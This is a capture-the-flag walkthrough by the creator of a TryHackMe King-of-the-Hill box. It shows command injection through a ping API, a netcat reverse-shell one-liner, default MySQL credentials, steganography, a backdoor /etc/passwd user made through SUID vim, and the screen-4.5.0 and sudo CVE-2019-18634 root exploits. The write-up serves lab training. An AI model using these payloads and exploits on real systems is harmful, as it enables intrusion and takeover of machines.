Check it out at TryHackMe KoTH Food CTF

Room created by me, TryHackMe profile

One of the first five KoTH boxes, foodCTF was the first challenge that I created for TryHackMe. This writeup is for the patched version, as the initial version had some small issues.


An initial nmap scan reveals several open ports, however with ctf style boxes it's always worth scanning all ports to see

root@ninja:~# nmap -sV
Starting Nmap 7.80 ( ) at 2020-05-02 20:20 BST
Nmap scan report for
Host is up (0.026s latency).
Not shown: 997 closed ports
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3306/tcp open  mysql   MySQL 5.7.29-0ubuntu0.18.04.1
9999/tcp open  abyss?
1 service unrecognized despite returning data.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 88.70 seconds

From the initial nmap scan, we only see 3 services.

The service running on 9999 is part of the infrastructure for king of the hill, and therefore not an attack vector.

SSH is off limits, as we don't have creds. This just leaves MySQL. We'll come back to this.

Running a full nmap scan, with the -p-, we see a few more ports open

root@ninja:~# nmap -sV -p-
Starting Nmap 7.80 ( ) at 2020-05-02 20:59 BST
Nmap scan report for
Host is up (0.033s latency).
Not shown: 65529 closed ports
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3306/tcp  open  mysql   MySQL 5.7.29-0ubuntu0.18.04.1
9999/tcp  open  abyss?
15065/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
16109/tcp open  unknown
46969/tcp open  telnet  Linux telnetd
2 services unrecognized despite returning data.

Initial Access

The HTTP server seems quite interesting, we'll check this out first. Navigating to the page, we're greeted with a message saying that the page is down. As hackers, we should never take this at face value. Time to break out gobuster and see if we can find anything else on that server.

Message stating the site is down.
root@ninja:~# gobuster dir -u -w /usr/share/wordlists/dirb/big.txt 
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/05/02 21:20:53 Starting gobuster
/monitor (Status: 301)
2020/05/02 21:21:30 Finished
The more polished interface, showing a 'ping host' box.

So on /monitor, we see a slightly more polished GUI. From a few other challenges, "Ping host" can often be a route for command injection. Let's try chaining commands in the text box.

The site after attempting to chain commands, showing that IP addresses are validated

Aww, it's not going to let us in that easily. It's trying to validate the IP address we enter somewhere. Let's check out what it's doing behind the scenes by reading the JS.

Screenshot of the obfuscated javascript code

The JS is obfuscated, and I don't fancy deobfuscating it. So let's see what it's actually doing if we put in a valid IP address. Opening the browser dev tools, we can track the HTTP requests that the page makes

Screenshot of firefox dev tools showing the HTTP request that was made

Interesting, we can see a POST request to /api/cmd with the body: "ping -c 4". That implies that the command is being formed clientside, let's try running our own commands with cURL!

root@ninja:~# curl -X POST -d "ls -lah"
total 7.8M
drwxr-xr-x 6 bread bread 4.0K Apr  6 20:21 .
drwxr-xr-x 7 root  root  4.0K Mar 28 01:49 ..
-rw------- 1 bread bread    5 Apr  6 20:21 .bash_history
-rw-r--r-- 1 bread bread  220 Mar 20 23:34 .bash_logout
-rw-r--r-- 1 bread bread 3.7K Mar 20 23:34 .bashrc
drwx------ 2 bread bread 4.0K Mar 20 23:42 .cache
----r--r-- 1 bread bread   38 Mar 28 01:24 flag
drwx------ 3 bread bread 4.0K Mar 20 23:42 .gnupg
drwxrwxr-x 3 bread bread 4.0K Mar 20 23:48 .local
-rwxrwxr-x 1 bread bread 7.7M Apr  6 17:58 main
-rw-rw-r-- 1 bread bread 1.5K Apr  6 17:58 main.go
-rw-r--r-- 1 bread bread  825 Mar 28 00:56 .profile
drwxrwxr-x 3 bread bread 4.0K Apr  6 20:18 resources

We have command injection, nice. Let's spawn a quick revshell to get slightly better access to the box.

root@ninja:~# curl -X POST -d 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 4242 >/tmp/f'
root@ninja:~# nc -lvnp 4242
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 50316
bash: cannot set terminal process group (703): Inappropriate ioctl for device
bash: no job control in this shell
bread@foodctf:~$ python3 -c 'import pty; pty.spawn("/bin/bash")'   
python3 -c 'import pty; pty.spawn("/bin/bash")'

This is a KoTH box. We shouldn't stop at one entry point. Let's explore MySQL next. I wonder if the default creds (root:root for old versions) will work for it...

root@ninja:~# mysql -h -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> 

Time to manually enumerate the databases and tables. Knowing how to do this is quite useful

MySQL [(none)]> show databases;
| Database           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| users              |
MySQL [(none)]> use users;
Database changed
MySQL [users]> show tables;
| Tables_in_users |
| User            |
MySQL [users]> select * from User;
| username | password                              |
| ramen    | PASSWORD REDACTED                     |
| flag     | FLAG REDACTED                         |

Now we have creds, let's try them for SSH.

root@ninja:~# ssh ramen@
ramen@'s password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

ramen@foodctf:~$ sudo -l
[sudo] password for ramen: ***************               
Sorry, user ramen may not run sudo on foodctf.

We're in!. Now enumerating permissions randomly, we notice that we get asterisks when entering our password for sudo. This isn't standard behaviour on Ubuntu. We'll come back to this.

We're running out of ports to look at. Let's try the one that's next up numerically, 16109. Nmap had no idea for this one, so let's try netcatting it. Netcat is a great way to interact with services at a lower level, skipping browsers and clients.

root@ninja:~# nc 16109
HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close

400 Bad Request

So it's a webserver. Let's try curl and see what that does.

root@ninja:~# curl
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: " to save to a file.
root@ninja:~# curl --output file16109
    % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                    Dload  Upload   Total   Spent    Left  Speed
100  372k    0  372k    0     0  2758k      0 --:--:-- --:--:-- --:--:-- 2758k
root@ninja:~# file file16109 
file16109: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1350x900, components 3

Seeing as we got a warning that it was binary data, we can assume it's serving something interesting. The "file" command tells us it's JPG data. Let's look at the image and see if that helps.

Picture of delicious looking food found on port 16109

Well, it's a picture of some nice looking food. Not really what you'd expect in a CTF. Maybe there's more to it? Let's run binwalk and then stegoveritas and see.

Binwalk found some Gzip data at the end, interesting. Let's check that out first.

root@ninja:~# binwalk -e 16109.jpg
0             0x0             JPEG image data, JFIF standard 1.01
381172        0x5D0F4         gzip compressed data, from Unix, last modified: 2020-03-19 23:53:20 
root@ninja:~# cd _16109.jpg.extracted/
root@ninja:~/_16109.jpg.extracted# binwalk -e 5D0F4.gz 
0             0x0             POSIX tar archive (GNU), owner user name: "t"
root@ninja:~/_16109.jpg.extracted# cd _5D0F4.gz.extracted/
root@ninja:~/_16109.jpg.extracted/_5D0F4.gz.extracted# ls
0.tar  creds.txt
root@ninja:~/_16109.jpg.extracted/_5D0F4.gz.extracted# cat creds.txt

More creds!

In the background, stegoveritas found some steghidden data. We should check that out.

root@ninja:~# cd results/
root@ninja:~/results# file steghide_690338949d3501d285a8ea4500db1147.bin 
steghide_690338949d3501d285a8ea4500db1147.bin: ASCII text
root@ninja:~/results# cat steghide_690338949d3501d285a8ea4500db1147.bin 

Same creds again. I guess the creator wanted to make sure people could find them even if they didn't know steg.

I guess we should test those creds then, via SSH.

root@ninja:~/results# ssh pasta@
pasta@'s password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
pasta@foodctf:~$ sudo -l
[sudo] password for pasta:               
Sorry, user pasta may not run sudo on foodctf.

Still no sudo, but we have another method of access.

I wonder what that last port has to offer. Nmap picked it up as telnet, so let's try telnetting into it.

root@ninja:~/results# telnet 46969
Connected to
Escape character is '^]'.
foodctf login: 

That's a fairly strange greeting. I wonder if it's ROT13 encoded? Nope. But maybe it's a different rotation? Playing around until you find something that looks about right, we get even more creds! (food:PASSWORD REDACTED)


With all of the ports explored, I think we need to try and get a root shell. None of the users so far had sudo, so let's look for other vectors. A really excellent resource for this is available here PayloadsAllTheThings Linux Privilege Escalation. First, SUID binaries.

pasta@foodctf:~$ find / -uid 0 -perm -4000 -type f 2>/dev/null

We have some unusual SUID binaries there. "/usr/bin/screen-4.5.0" implies that it was installed manually rather than with apt. "/usr/bin/vim.basic" is also probably interesting. Searching exploitdb, we find so let's download and transfer this and run it.

pasta@foodctf:~$ nano
pasta@foodctf:~$ chmod +x 
pasta@foodctf:~$ ./ 
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function ‘dropshell’:
/tmp/libhax.c:7:5: warning: implicit declaration of function ‘chmod’; did you mean ‘chroot’? [-Wimplicit-function-declaration]
     chmod("/tmp/rootshell", 04755);
/tmp/rootshell.c: In function ‘main’:
/tmp/rootshell.c:3:5: warning: implicit declaration of function ‘setuid’; did you mean ‘setbuf’? [-Wimplicit-function-declaration]
/tmp/rootshell.c:4:5: warning: implicit declaration of function ‘setgid’; did you mean ‘setbuf’? [-Wimplicit-function-declaration]
/tmp/rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’; did you mean ‘setbuf’? [-Wimplicit-function-declaration]
/tmp/rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
/tmp/rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
     execvp("/bin/sh", NULL, NULL);
[+] Now we create our /etc/ file...
[+] Triggering...
' from /etc/ cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-pasta.

# whoami

Now, vim. Spawning a shell from Vim doesn't give us a root shell, even though Vim is running as root. So let's try something slightly different. Let's make a backdoor user.

pasta@foodctf:~$ vim /etc/passwd
pasta@foodctf:~$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
mysql:x:112:114:MySQL Server,,,:/nonexistent:/bin/false
pasta@foodctf:~$ su hacker

One more privesc. We noticed earlier that we got asterisks when entering our password for Sudo. There was a recent CVE (2019-18634) that affects sudo when this option is configured. The option is called PWFEEDBACK, and an exploit PoC is available here Github saleemrashid - Sudo CVE-2019-18634

Let's compile this from Kali and copy over the binary, then run it!

root@ninja:~/Documents# git clone ''
Cloning into 'sudo-cve-2019-18634'...
Unpacking objects: 100% (24/24), done.
root@ninja:~/Documents# cd sudo-cve-2019-18634/
root@ninja:~/Documents/sudo-cve-2019-18634# ls
exploit.c  LICENSE  Makefile
root@ninja:~/Documents/sudo-cve-2019-18634# make
cc -Os -g3 -std=c99 -Wall -Wextra -Wpedantic -static -o exploit exploit.c
root@ninja:~/Documents/sudo-cve-2019-18634# ls
exploit  exploit.c  LICENSE  Makefile 
root@ninja:~/Documents/sudo-cve-2019-18634# scp /root/Documents/sudo-cve-2019-18634/exploit pasta@
pasta@'s password: 
exploit 100%  881KB 805.9KB/s   00:01    
root@ninja:~/Documents/sudo-cve-2019-18634# ssh pasta@
pasta@'s password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
pasta@foodctf:~$ ls  exploit
pasta@foodctf:~$ chmod +x exploit 
pasta@foodctf:~$ ./exploit
[sudo] password for pasta: 
Sorry, try again.
# whoami

This exploit works even for users that can't run any commands with sudo, which makes it one of my favourites. You get a root shell, because the "sudo" binary runs as root due to suid.

That's all you need, other than finding the flags. I won't reveal the locations of those, that's down to you to find. Hope you've enjoyed, or at least learnt something.